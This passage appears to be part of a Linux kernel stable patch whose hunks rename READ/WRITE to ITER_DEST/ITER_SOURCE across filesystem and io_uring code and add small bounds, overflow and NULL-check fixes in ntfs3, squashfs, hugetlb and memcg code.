+ 	struct iov_iter iter;
+ 
+ 	netfs_stat(&netfs_n_rh_read);
+-	iov_iter_xarray(&iter, READ, &rreq->mapping->i_pages,
++	iov_iter_xarray(&iter, ITER_DEST, &rreq->mapping->i_pages,
+ 			subreq->start + subreq->transferred,
+ 			subreq->len   - subreq->transferred);
+ 
+@@ -208,7 +208,7 @@ static void netfs_rreq_do_write_to_cache(struct netfs_io_request *rreq)
+ 			continue;
+ 		}
+ 
+-		iov_iter_xarray(&iter, WRITE, &rreq->mapping->i_pages,
++		iov_iter_xarray(&iter, ITER_SOURCE, &rreq->mapping->i_pages,
+ 				subreq->start, subreq->len);
+ 
+ 		atomic_inc(&rreq->nr_copy_ops);
+diff --git a/fs/nfs/fscache.c b/fs/nfs/fscache.c
+index e861d7bae305f..e731c00a9fcbc 100644
+--- a/fs/nfs/fscache.c
++++ b/fs/nfs/fscache.c
+@@ -252,7 +252,7 @@ static int fscache_fallback_read_page(struct inode *inode, struct page *page)
+ 	bvec[0].bv_page		= page;
+ 	bvec[0].bv_offset	= 0;
+ 	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, READ, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_DEST, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+ 
+ 	ret = fscache_begin_read_operation(&cres, cookie);
+ 	if (ret < 0)
+@@ -282,7 +282,7 @@ static int fscache_fallback_write_page(struct inode *inode, struct page *page,
+ 	bvec[0].bv_page		= page;
+ 	bvec[0].bv_offset	= 0;
+ 	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, WRITE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_SOURCE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+ 
+ 	ret = fscache_begin_write_operation(&cres, cookie);
+ 	if (ret < 0)
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 2934ab1d9862b..0d49c6bb22eb1 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -943,7 +943,7 @@ __be32 nfsd_readv(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	ssize_t host_err;
+ 
+ 	trace_nfsd_read_vector(rqstp, fhp, offset, *count);
+-	iov_iter_kvec(&iter, READ, vec, vlen, *count);
++	iov_iter_kvec(&iter, ITER_DEST, vec, vlen, *count);
+ 	host_err = vfs_iter_read(file, &iter, &ppos, 0);
+ 	return nfsd_finish_read(rqstp, fhp, file, offset, count, eof, host_err);
+ }
+@@ -1033,7 +1033,7 @@ nfsd_vfs_write(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
+ 	if (stable && !use_wgather)
+ 		flags |= RWF_SYNC;
+ 
+-	iov_iter_kvec(&iter, WRITE, vec, vlen, *cnt);
++	iov_iter_kvec(&iter, ITER_SOURCE, vec, vlen, *cnt);
+ 	since = READ_ONCE(file->f_wb_err);
+ 	if (verf)
+ 		nfsd_copy_write_verifier(verf, nn);
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index e352aa37330cd..22152300e60ca 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -132,6 +132,13 @@ next_attr:
+ 	if (le16_to_cpu(attr->name_off) + attr->name_len > asize)
+ 		goto out;
+ 
++	if (attr->non_res) {
++		t64 = le64_to_cpu(attr->nres.alloc_size);
++		if (le64_to_cpu(attr->nres.data_size) > t64 ||
++		    le64_to_cpu(attr->nres.valid_size) > t64)
++			goto out;
++	}
++
+ 	switch (attr->type) {
+ 	case ATTR_STD:
+ 		if (attr->non_res ||
+diff --git a/fs/ocfs2/cluster/tcp.c b/fs/ocfs2/cluster/tcp.c
+index f660c0dbdb63b..785cabd71d670 100644
+--- a/fs/ocfs2/cluster/tcp.c
++++ b/fs/ocfs2/cluster/tcp.c
+@@ -900,7 +900,7 @@ static int o2net_recv_tcp_msg(struct socket *sock, void *data, size_t len)
+ {
+ 	struct kvec vec = { .iov_len = len, .iov_base = data, };
+ 	struct msghdr msg = { .msg_flags = MSG_DONTWAIT, };
+-	iov_iter_kvec(&msg.msg_iter, READ, &vec, 1, len);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &vec, 1, len);
+ 	return sock_recvmsg(sock, &msg, MSG_DONTWAIT);
+ }
+ 
+diff --git a/fs/orangefs/inode.c b/fs/orangefs/inode.c
+index 7a8c0c6e698de..b3bbb5a5787ac 100644
+--- a/fs/orangefs/inode.c
++++ b/fs/orangefs/inode.c
+@@ -53,7 +53,7 @@ static int orangefs_writepage_locked(struct page *page,
+ 	bv.bv_len = wlen;
+ 	bv.bv_offset = off % PAGE_SIZE;
+ 	WARN_ON(wlen == 0);
+-	iov_iter_bvec(&iter, WRITE, &bv, 1, wlen);
++	iov_iter_bvec(&iter, ITER_SOURCE, &bv, 1, wlen);
+ 
+ 	ret = wait_for_direct_io(ORANGEFS_IO_WRITE, inode, &off, &iter, wlen,
+ 	    len, wr, NULL, NULL);
+@@ -112,7 +112,7 @@ static int orangefs_writepages_work(struct orangefs_writepages *ow,
+ 		else
+ 			ow->bv[i].bv_offset = 0;
+ 	}
+-	iov_iter_bvec(&iter, WRITE, ow->bv, ow->npages, ow->len);
++	iov_iter_bvec(&iter, ITER_SOURCE, ow->bv, ow->npages, ow->len);
+ 
+ 	WARN_ON(ow->off >= len);
+ 	if (ow->off + ow->len > len)
+@@ -270,7 +270,7 @@ static void orangefs_readahead(struct readahead_control *rac)
+ 	offset = readahead_pos(rac);
+ 	i_pages = &rac->mapping->i_pages;
+ 
+-	iov_iter_xarray(&iter, READ, i_pages, offset, readahead_length(rac));
++	iov_iter_xarray(&iter, ITER_DEST, i_pages, offset, readahead_length(rac));
+ 
+ 	/* read in the pages. */
+ 	if ((ret = wait_for_direct_io(ORANGEFS_IO_READ, inode,
+@@ -303,7 +303,7 @@ static int orangefs_read_folio(struct file *file, struct folio *folio)
+ 	bv.bv_page = &folio->page;
+ 	bv.bv_len = folio_size(folio);
+ 	bv.bv_offset = 0;
+-	iov_iter_bvec(&iter, READ, &bv, 1, folio_size(folio));
++	iov_iter_bvec(&iter, ITER_DEST, &bv, 1, folio_size(folio));
+ 
+ 	ret = wait_for_direct_io(ORANGEFS_IO_READ, inode, &off, &iter,
+ 			folio_size(folio), inode->i_size, NULL, NULL, file);
+diff --git a/fs/overlayfs/export.c b/fs/overlayfs/export.c
+index e065a5b9a442e..ac9c3ad04016e 100644
+--- a/fs/overlayfs/export.c
++++ b/fs/overlayfs/export.c
+@@ -796,7 +796,7 @@ static struct ovl_fh *ovl_fid_to_fh(struct fid *fid, int buflen, int fh_type)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	/* Copy unaligned inner fh into aligned buffer */
+-	memcpy(&fh->fb, fid, buflen - OVL_FH_WIRE_OFFSET);
++	memcpy(fh->buf, fid, buflen - OVL_FH_WIRE_OFFSET);
+ 	return fh;
+ }
+ 
+diff --git a/fs/overlayfs/overlayfs.h b/fs/overlayfs/overlayfs.h
+index eee8f08d32b63..e74a610a117ec 100644
+--- a/fs/overlayfs/overlayfs.h
++++ b/fs/overlayfs/overlayfs.h
+@@ -108,7 +108,7 @@ struct ovl_fh {
+ 	u8 padding[3];	/* make sure fb.fid is 32bit aligned */
+ 	union {
+ 		struct ovl_fb fb;
+-		u8 buf[0];
++		DECLARE_FLEX_ARRAY(u8, buf);
+ 	};
+ } __packed;
+ 
+diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
+index 8a74cdcc9af00..a954305fbc31b 100644
+--- a/fs/proc/task_mmu.c
++++ b/fs/proc/task_mmu.c
+@@ -737,9 +737,7 @@ static int smaps_hugetlb_range(pte_t *pte, unsigned long hmask,
+ 			page = pfn_swap_entry_to_page(swpent);
+ 	}
+ 	if (page) {
+-		int mapcount = page_mapcount(page);
+-
+-		if (mapcount >= 2)
++		if (page_mapcount(page) >= 2 || hugetlb_pmd_shared(pte))
+ 			mss->shared_hugetlb += huge_page_size(hstate_vma(vma));
+ 		else
+ 			mss->private_hugetlb += huge_page_size(hstate_vma(vma));
+diff --git a/fs/proc/vmcore.c b/fs/proc/vmcore.c
+index f2aa86c421f2d..5aa527ca6dbe8 100644
+--- a/fs/proc/vmcore.c
++++ b/fs/proc/vmcore.c
+@@ -199,7 +199,7 @@ ssize_t __weak elfcorehdr_read(char *buf, size_t count, u64 *ppos)
+ 	struct kvec kvec = { .iov_base = buf, .iov_len = count };
+ 	struct iov_iter iter;
+ 
+-	iov_iter_kvec(&iter, READ, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 
+ 	return read_from_oldmem(&iter, count, ppos, false);
+ }
+@@ -212,7 +212,7 @@ ssize_t __weak elfcorehdr_read_notes(char *buf, size_t count, u64 *ppos)
+ 	struct kvec kvec = { .iov_base = buf, .iov_len = count };
+ 	struct iov_iter iter;
+ 
+-	iov_iter_kvec(&iter, READ, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 
+ 	return read_from_oldmem(&iter, count, ppos,
+ 			cc_platform_has(CC_ATTR_MEM_ENCRYPT));
+@@ -437,7 +437,7 @@ static vm_fault_t mmap_vmcore_fault(struct vm_fault *vmf)
+ 		offset = (loff_t) index << PAGE_SHIFT;
+ 		kvec.iov_base = page_address(page);
+ 		kvec.iov_len = PAGE_SIZE;
+-		iov_iter_kvec(&iter, READ, &kvec, 1, PAGE_SIZE);
++		iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, PAGE_SIZE);
+ 
+ 		rc = __read_vmcore(&iter, &offset);
+ 		if (rc < 0) {
+diff --git a/fs/read_write.c b/fs/read_write.c
+index 24b9668d63770..7a2ff6157eda4 100644
+--- a/fs/read_write.c
++++ b/fs/read_write.c
+@@ -384,7 +384,7 @@ static ssize_t new_sync_read(struct file *filp, char __user *buf, size_t len, lo
+ 
+ 	init_sync_kiocb(&kiocb, filp);
+ 	kiocb.ki_pos = (ppos ? *ppos : 0);
+-	iov_iter_ubuf(&iter, READ, buf, len);
++	iov_iter_ubuf(&iter, ITER_DEST, buf, len);
+ 
+ 	ret = call_read_iter(filp, &kiocb, &iter);
+ 	BUG_ON(ret == -EIOCBQUEUED);
+@@ -424,7 +424,7 @@ ssize_t __kernel_read(struct file *file, void *buf, size_t count, loff_t *pos)
+ 
+ 	init_sync_kiocb(&kiocb, file);
+ 	kiocb.ki_pos = pos ? *pos : 0;
+-	iov_iter_kvec(&iter, READ, &iov, 1, iov.iov_len);
++	iov_iter_kvec(&iter, ITER_DEST, &iov, 1, iov.iov_len);
+ 	ret = file->f_op->read_iter(&kiocb, &iter);
+ 	if (ret > 0) {
+ 		if (pos)
+@@ -486,7 +486,7 @@ static ssize_t new_sync_write(struct file *filp, const char __user *buf, size_t
+ 
+ 	init_sync_kiocb(&kiocb, filp);
+ 	kiocb.ki_pos = (ppos ? *ppos : 0);
+-	iov_iter_ubuf(&iter, WRITE, (void __user *)buf, len);
++	iov_iter_ubuf(&iter, ITER_SOURCE, (void __user *)buf, len);
+ 
+ 	ret = call_write_iter(filp, &kiocb, &iter);
+ 	BUG_ON(ret == -EIOCBQUEUED);
+@@ -533,7 +533,7 @@ ssize_t __kernel_write(struct file *file, const void *buf, size_t count, loff_t
+ 		.iov_len	= min_t(size_t, count, MAX_RW_COUNT),
+ 	};
+ 	struct iov_iter iter;
+-	iov_iter_kvec(&iter, WRITE, &iov, 1, iov.iov_len);
++	iov_iter_kvec(&iter, ITER_SOURCE, &iov, 1, iov.iov_len);
+ 	return __kernel_write_iter(file, &iter, pos);
+ }
+ /*
+@@ -911,7 +911,7 @@ static ssize_t vfs_readv(struct file *file, const struct iovec __user *vec,
+ 	struct iov_iter iter;
+ 	ssize_t ret;
+ 
+-	ret = import_iovec(READ, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
++	ret = import_iovec(ITER_DEST, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
+ 	if (ret >= 0) {
+ 		ret = do_iter_read(file, &iter, pos, flags);
+ 		kfree(iov);
+@@ -928,7 +928,7 @@ static ssize_t vfs_writev(struct file *file, const struct iovec __user *vec,
+ 	struct iov_iter iter;
+ 	ssize_t ret;
+ 
+-	ret = import_iovec(WRITE, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
++	ret = import_iovec(ITER_SOURCE, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
+ 	if (ret >= 0) {
+ 		file_start_write(file);
+ 		ret = do_iter_write(file, &iter, pos, flags);
+diff --git a/fs/seq_file.c b/fs/seq_file.c
+index 9456a2032224a..f5fdaf3b15728 100644
+--- a/fs/seq_file.c
++++ b/fs/seq_file.c
+@@ -156,7 +156,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
+ 	ssize_t ret;
+ 
+ 	init_sync_kiocb(&kiocb, file);
+-	iov_iter_init(&iter, READ, &iov, 1, size);
++	iov_iter_init(&iter, ITER_DEST, &iov, 1, size);
+ 
+ 	kiocb.ki_pos = *ppos;
+ 	ret = seq_read_iter(&kiocb, &iter);
+diff --git a/fs/splice.c b/fs/splice.c
+index 0878b852b355c..5969b7a1d353a 100644
+--- a/fs/splice.c
++++ b/fs/splice.c
+@@ -303,7 +303,7 @@ ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
+ 	struct kiocb kiocb;
+ 	int ret;
+ 
+-	iov_iter_pipe(&to, READ, pipe, len);
++	iov_iter_pipe(&to, ITER_DEST, pipe, len);
+ 	init_sync_kiocb(&kiocb, in);
+ 	kiocb.ki_pos = *ppos;
+ 	ret = call_read_iter(in, &kiocb, &to);
+@@ -682,7 +682,7 @@ iter_file_splice_write(struct pipe_inode_info *pipe, struct file *out,
+ 			n++;
+ 		}
+ 
+-		iov_iter_bvec(&from, WRITE, array, n, sd.total_len - left);
++		iov_iter_bvec(&from, ITER_SOURCE, array, n, sd.total_len - left);
+ 		ret = vfs_iter_write(out, &from, &sd.pos, 0);
+ 		if (ret <= 0)
+ 			break;
+@@ -1263,9 +1263,9 @@ static int vmsplice_type(struct fd f, int *type)
+ 	if (!f.file)
+ 		return -EBADF;
+ 	if (f.file->f_mode & FMODE_WRITE) {
+-		*type = WRITE;
++		*type = ITER_SOURCE;
+ 	} else if (f.file->f_mode & FMODE_READ) {
+-		*type = READ;
++		*type = ITER_DEST;
+ 	} else {
+ 		fdput(f);
+ 		return -EBADF;
+@@ -1314,7 +1314,7 @@ SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, uiov,
+ 
+ 	if (!iov_iter_count(&iter))
+ 		error = 0;
+-	else if (iov_iter_rw(&iter) == WRITE)
++	else if (type == ITER_SOURCE)
+ 		error = vmsplice_to_pipe(f.file, &iter, flags);
+ 	else
+ 		error = vmsplice_to_user(f.file, &iter, flags);
+diff --git a/fs/squashfs/squashfs_fs.h b/fs/squashfs/squashfs_fs.h
+index b3fdc8212c5f5..95f8e89017689 100644
+--- a/fs/squashfs/squashfs_fs.h
++++ b/fs/squashfs/squashfs_fs.h
+@@ -183,7 +183,7 @@ static inline int squashfs_block_size(__le32 raw)
+ #define SQUASHFS_ID_BLOCK_BYTES(A)	(SQUASHFS_ID_BLOCKS(A) *\
+ 					sizeof(u64))
+ /* xattr id lookup table defines */
+-#define SQUASHFS_XATTR_BYTES(A)		((A) * sizeof(struct squashfs_xattr_id))
++#define SQUASHFS_XATTR_BYTES(A)		(((u64) (A)) * sizeof(struct squashfs_xattr_id))
+ 
+ #define SQUASHFS_XATTR_BLOCK(A)		(SQUASHFS_XATTR_BYTES(A) / \
+ 					SQUASHFS_METADATA_SIZE)
+diff --git a/fs/squashfs/squashfs_fs_sb.h b/fs/squashfs/squashfs_fs_sb.h
+index 1e90c2575f9bf..0c1ae97897317 100644
+--- a/fs/squashfs/squashfs_fs_sb.h
++++ b/fs/squashfs/squashfs_fs_sb.h
+@@ -63,7 +63,7 @@ struct squashfs_sb_info {
+ 	long long				bytes_used;
+ 	unsigned int				inodes;
+ 	unsigned int				fragments;
+-	int					xattr_ids;
++	unsigned int				xattr_ids;
+ 	unsigned int				ids;
+ 	bool					panic_on_errors;
+ };
+diff --git a/fs/squashfs/xattr.h b/fs/squashfs/xattr.h
+index d8a270d3ac4cb..f1a463d8bfa02 100644
+--- a/fs/squashfs/xattr.h
++++ b/fs/squashfs/xattr.h
+@@ -10,12 +10,12 @@
+ 
+ #ifdef CONFIG_SQUASHFS_XATTR
+ extern __le64 *squashfs_read_xattr_id_table(struct super_block *, u64,
+-		u64 *, int *);
++		u64 *, unsigned int *);
+ extern int squashfs_xattr_lookup(struct super_block *, unsigned int, int *,
+ 		unsigned int *, unsigned long long *);
+ #else
+ static inline __le64 *squashfs_read_xattr_id_table(struct super_block *sb,
+-		u64 start, u64 *xattr_table_start, int *xattr_ids)
++		u64 start, u64 *xattr_table_start, unsigned int *xattr_ids)
+ {
+ 	struct squashfs_xattr_id_table *id_table;
+ 
+diff --git a/fs/squashfs/xattr_id.c b/fs/squashfs/xattr_id.c
+index 087cab8c78f4e..b88d19e9581e9 100644
+--- a/fs/squashfs/xattr_id.c
++++ b/fs/squashfs/xattr_id.c
+@@ -56,7 +56,7 @@ int squashfs_xattr_lookup(struct super_block *sb, unsigned int index,
+  * Read uncompressed xattr id lookup table indexes from disk into memory
+  */
+ __le64 *squashfs_read_xattr_id_table(struct super_block *sb, u64 table_start,
+-		u64 *xattr_table_start, int *xattr_ids)
++		u64 *xattr_table_start, unsigned int *xattr_ids)
+ {
+ 	struct squashfs_sb_info *msblk = sb->s_fs_info;
+ 	unsigned int len, indexes;
+@@ -76,7 +76,7 @@ __le64 *squashfs_read_xattr_id_table(struct super_block *sb, u64 table_start,
+ 	/* Sanity check values */
+ 
+ 	/* there is always at least one xattr id */
+-	if (*xattr_ids == 0)
++	if (*xattr_ids <= 0)
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	len = SQUASHFS_XATTR_BLOCK_BYTES(*xattr_ids);
+diff --git a/include/kunit/test.h b/include/kunit/test.h
+index b1ab6b32216d7..ebcdbddf8344d 100644
+--- a/include/kunit/test.h
++++ b/include/kunit/test.h
+@@ -299,7 +299,6 @@ static inline int kunit_run_all_tests(void)
+  */
+ #define kunit_test_init_section_suites(__suites...)			\
+ 	__kunit_test_suites(CONCATENATE(__UNIQUE_ID(array), _probe),	\
+-			    CONCATENATE(__UNIQUE_ID(suites), _probe),	\
+ 			    ##__suites)
+ 
+ #define kunit_test_init_section_suite(suite)	\
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index 4aa1dbc7b0646..4e1bfee9675d2 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -668,7 +668,8 @@ extern struct efi {
+ 
+ #define EFI_RT_SUPPORTED_ALL					0x3fff
+ 
+-#define EFI_RT_SUPPORTED_TIME_SERVICES				0x000f
++#define EFI_RT_SUPPORTED_TIME_SERVICES				0x0003
++#define EFI_RT_SUPPORTED_WAKEUP_SERVICES			0x000c
+ #define EFI_RT_SUPPORTED_VARIABLE_SERVICES			0x0070
+ 
+ extern struct mm_struct efi_mm;
+diff --git a/include/linux/highmem-internal.h b/include/linux/highmem-internal.h
+index 034b1106d0228..e098f38422af5 100644
+--- a/include/linux/highmem-internal.h
++++ b/include/linux/highmem-internal.h
+@@ -200,7 +200,7 @@ static inline void *kmap_local_pfn(unsigned long pfn)
+ static inline void __kunmap_local(const void *addr)
+ {
+ #ifdef ARCH_HAS_FLUSH_ON_KUNMAP
+-	kunmap_flush_on_unmap(addr);
++	kunmap_flush_on_unmap(PTR_ALIGN_DOWN(addr, PAGE_SIZE));
+ #endif
+ }
+ 
+@@ -227,7 +227,7 @@ static inline void *kmap_atomic_pfn(unsigned long pfn)
+ static inline void __kunmap_atomic(const void *addr)
+ {
+ #ifdef ARCH_HAS_FLUSH_ON_KUNMAP
+-	kunmap_flush_on_unmap(addr);
++	kunmap_flush_on_unmap(PTR_ALIGN_DOWN(addr, PAGE_SIZE));
+ #endif
+ 	pagefault_enable();
+ 	if (IS_ENABLED(CONFIG_PREEMPT_RT))
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 8b4f93e848680..770650d1ff842 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -7,6 +7,7 @@
+ #include <linux/fs.h>
+ #include <linux/hugetlb_inline.h>
+ #include <linux/cgroup.h>
++#include <linux/page_ref.h>
+ #include <linux/list.h>
+ #include <linux/kref.h>
+ #include <linux/pgtable.h>
+@@ -1182,6 +1183,18 @@ static inline __init void hugetlb_cma_reserve(int order)
+ }
+ #endif
+ 
++#ifdef CONFIG_ARCH_WANT_HUGE_PMD_SHARE
++static inline bool hugetlb_pmd_shared(pte_t *pte)
++{
++	return page_count(virt_to_page(pte)) > 1;
++}
++#else
++static inline bool hugetlb_pmd_shared(pte_t *pte)
++{
++	return false;
++}
++#endif
++
+ bool want_pmd_share(struct vm_area_struct *vma, unsigned long addr);
+ 
+ #ifndef __HAVE_ARCH_FLUSH_HUGETLB_TLB_RANGE
+diff --git a/include/linux/memcontrol.h b/include/linux/memcontrol.h
+index e1644a24009c8..e039763029563 100644
+--- a/include/linux/memcontrol.h
++++ b/include/linux/memcontrol.h
+@@ -1655,10 +1655,13 @@ void mem_cgroup_track_foreign_dirty_slowpath(struct folio *folio,
+ static inline void mem_cgroup_track_foreign_dirty(struct folio *folio,
+ 						  struct bdi_writeback *wb)
+ {
++	struct mem_cgroup *memcg;
++
+ 	if (mem_cgroup_disabled())
+ 		return;
+ 
+-	if (unlikely(&folio_memcg(folio)->css != wb->memcg_css))
++	memcg = folio_memcg(folio);
++	if (unlikely(memcg && &memcg->css != wb->memcg_css))
+ 		mem_cgroup_track_foreign_dirty_slowpath(folio, wb);
+ }
+ 
+diff --git a/include/linux/nvmem-provider.h b/include/linux/nvmem-provider.h
+index 50caa117cb620..bb15c9234e21e 100644
+--- a/include/linux/nvmem-provider.h
++++ b/include/linux/nvmem-provider.h
+@@ -70,7 +70,6 @@ struct nvmem_keepout {
+  * @word_size:	Minimum read/write access granularity.
+  * @stride:	Minimum read/write access stride.
+  * @priv:	User context passed to read/write callbacks.
+- * @wp-gpio:	Write protect pin
+  * @ignore_wp:  Write Protect pin is managed by the provider.
+  *
+  * Note: A default "nvmem<id>" name will be assigned to the device if
+@@ -85,7 +84,6 @@ struct nvmem_config {
+ 	const char		*name;
+ 	int			id;
+ 	struct module		*owner;
+-	struct gpio_desc	*wp_gpio;
+ 	const struct nvmem_cell_info	*cells;
+ 	int			ncells;
+ 	const struct nvmem_keepout *keepout;
+diff --git a/include/linux/uio.h b/include/linux/uio.h
+index 2e3134b14ffd9..87fc3d0dda98f 100644
+--- a/include/linux/uio.h
++++ b/include/linux/uio.h
+@@ -29,6 +29,9 @@ enum iter_type {
+ 	ITER_UBUF,
+ };
+ 
++#define ITER_SOURCE	1	// == WRITE
++#define ITER_DEST	0	// == READ
++
+ struct iov_iter_state {
+ 	size_t iov_offset;
+ 	size_t count;
+diff --git a/include/linux/util_macros.h b/include/linux/util_macros.h
+index 72299f261b253..43db6e47503c7 100644
+--- a/include/linux/util_macros.h
++++ b/include/linux/util_macros.h
+@@ -38,4 +38,16 @@
+  */
+ #define find_closest_descending(x, a, as) __find_closest(x, a, as, >=)
+ 
++/**
++ * is_insidevar - check if the @ptr points inside the @var memory range.
++ * @ptr:	the pointer to a memory address.
++ * @var:	the variable which address and size identify the memory range.
++ *
++ * Evaluates to true if the address in @ptr lies within the memory
++ * range allocated to @var.
++ */
++#define is_insidevar(ptr, var)						\
++	((uintptr_t)(ptr) >= (uintptr_t)(var) &&			\
++	 (uintptr_t)(ptr) <  (uintptr_t)(var) + sizeof(var))
++
+ #endif
+diff --git a/include/scsi/libiscsi.h b/include/scsi/libiscsi.h
+index 654cc3918c948..7fb3cb787df41 100644
+--- a/include/scsi/libiscsi.h
++++ b/include/scsi/libiscsi.h
+@@ -422,6 +422,8 @@ extern int iscsi_host_get_max_scsi_cmds(struct Scsi_Host *shost,
+ extern struct iscsi_cls_session *
+ iscsi_session_setup(struct iscsi_transport *, struct Scsi_Host *shost,
+ 		    uint16_t, int, int, uint32_t, unsigned int);
++void iscsi_session_remove(struct iscsi_cls_session *cls_session);
++void iscsi_session_free(struct iscsi_cls_session *cls_session);
+ extern void iscsi_session_teardown(struct iscsi_cls_session *);
+ extern void iscsi_session_recovery_timedout(struct iscsi_cls_session *);
+ extern int iscsi_set_param(struct iscsi_cls_conn *cls_conn,
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 9046e269e5a58..520a73b5a4483 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -364,7 +364,7 @@ int io_send(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (unlikely(!sock))
+ 		return -ENOTSOCK;
+ 
+-	ret = import_single_range(WRITE, sr->buf, sr->len, &iov, &msg.msg_iter);
++	ret = import_single_range(ITER_SOURCE, sr->buf, sr->len, &iov, &msg.msg_iter);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
+@@ -450,7 +450,7 @@ static int __io_recvmsg_copy_hdr(struct io_kiocb *req,
+ 		}
+ 	} else {
+ 		iomsg->free_iov = iomsg->fast_iov;
+-		ret = __import_iovec(READ, msg.msg_iov, msg.msg_iovlen, UIO_FASTIOV,
++		ret = __import_iovec(ITER_DEST, msg.msg_iov, msg.msg_iovlen, UIO_FASTIOV,
+ 				     &iomsg->free_iov, &iomsg->msg.msg_iter,
+ 				     false);
+ 		if (ret > 0)
+@@ -503,7 +503,7 @@ static int __io_compat_recvmsg_copy_hdr(struct io_kiocb *req,
+ 		}
+ 	} else {
+ 		iomsg->free_iov = iomsg->fast_iov;
+-		ret = __import_iovec(READ, (struct iovec __user *)uiov, msg.msg_iovlen,
++		ret = __import_iovec(ITER_DEST, (struct iovec __user *)uiov, msg.msg_iovlen,
+ 				   UIO_FASTIOV, &iomsg->free_iov,
+ 				   &iomsg->msg.msg_iter, true);
+ 		if (ret < 0)
+@@ -763,7 +763,7 @@ retry_multishot:
+ 
+ 		kmsg->fast_iov[0].iov_base = buf;
+ 		kmsg->fast_iov[0].iov_len = len;
+-		iov_iter_init(&kmsg->msg.msg_iter, READ, kmsg->fast_iov, 1,
++		iov_iter_init(&kmsg->msg.msg_iter, ITER_DEST, kmsg->fast_iov, 1,
+ 				len);
+ 	}
+ 
+@@ -857,7 +857,7 @@ retry_multishot:
+ 		sr->buf = buf;
+ 	}
+ 
+-	ret = import_single_range(READ, sr->buf, len, &iov, &msg.msg_iter);
++	ret = import_single_range(ITER_DEST, sr->buf, len, &iov, &msg.msg_iter);
+ 	if (unlikely(ret))
+ 		goto out_free;
+ 
+@@ -1097,13 +1097,13 @@ int io_send_zc(struct io_kiocb *req, unsigned int issue_flags)
+ 		return io_setup_async_addr(req, &__address, issue_flags);
+ 
+ 	if (zc->flags & IORING_RECVSEND_FIXED_BUF) {
+-		ret = io_import_fixed(WRITE, &msg.msg_iter, req->imu,
++		ret = io_import_fixed(ITER_SOURCE, &msg.msg_iter, req->imu,
+ 					(u64)(uintptr_t)zc->buf, zc->len);
+ 		if (unlikely(ret))
+ 			return ret;
+ 		msg.sg_from_iter = io_sg_from_iter;
+ 	} else {
+-		ret = import_single_range(WRITE, zc->buf, zc->len, &iov,
++		ret = import_single_range(ITER_SOURCE, zc->buf, zc->len, &iov,
+ 					  &msg.msg_iter);
+ 		if (unlikely(ret))
+ 			return ret;
+diff --git a/io_uring/rw.c b/io_uring/rw.c
+index 6223472095d2c..0218fae12eddc 100644
+--- a/io_uring/rw.c
++++ b/io_uring/rw.c
+@@ -548,12 +548,12 @@ static inline int io_rw_prep_async(struct io_kiocb *req, int rw)
+ 
+ int io_readv_prep_async(struct io_kiocb *req)
+ {
+-	return io_rw_prep_async(req, READ);
++	return io_rw_prep_async(req, ITER_DEST);
+ }
+ 
+ int io_writev_prep_async(struct io_kiocb *req)
+ {
+-	return io_rw_prep_async(req, WRITE);
++	return io_rw_prep_async(req, ITER_SOURCE);
+ }
+ 
+ /*
+@@ -704,7 +704,7 @@ int io_read(struct io_kiocb *req, unsigned int issue_flags)
+ 	loff_t *ppos;
+ 
+ 	if (!req_has_async_data(req)) {
+-		ret = io_import_iovec(READ, req, &iovec, s, issue_flags);
++		ret = io_import_iovec(ITER_DEST, req, &iovec, s, issue_flags);
+ 		if (unlikely(ret < 0))
+ 			return ret;
+ 	} else {
+@@ -716,7 +716,7 @@ int io_read(struct io_kiocb *req, unsigned int issue_flags)
+ 		 * buffers, as we dropped the selected one before retry.
+ 		 */
+ 		if (io_do_buffer_select(req)) {
+-			ret = io_import_iovec(READ, req, &iovec, s, issue_flags);
++			ret = io_import_iovec(ITER_DEST, req, &iovec, s, issue_flags);
+ 			if (unlikely(ret < 0))
+ 				return ret;
+ 		}
+@@ -851,7 +851,7 @@ int io_write(struct io_kiocb *req, unsigned int issue_flags)
+ 	loff_t *ppos;
+ 
+ 	if (!req_has_async_data(req)) {
+-		ret = io_import_iovec(WRITE, req, &iovec, s, issue_flags);
++		ret = io_import_iovec(ITER_SOURCE, req, &iovec, s, issue_flags);
+ 		if (unlikely(ret < 0))
+ 			return ret;
+ 	} else {
+diff --git a/kernel/bpf/bpf_lsm.c b/kernel/bpf/bpf_lsm.c
+index d6c9b3705f242..e6a76da4bca78 100644
+--- a/kernel/bpf/bpf_lsm.c
++++ b/kernel/bpf/bpf_lsm.c
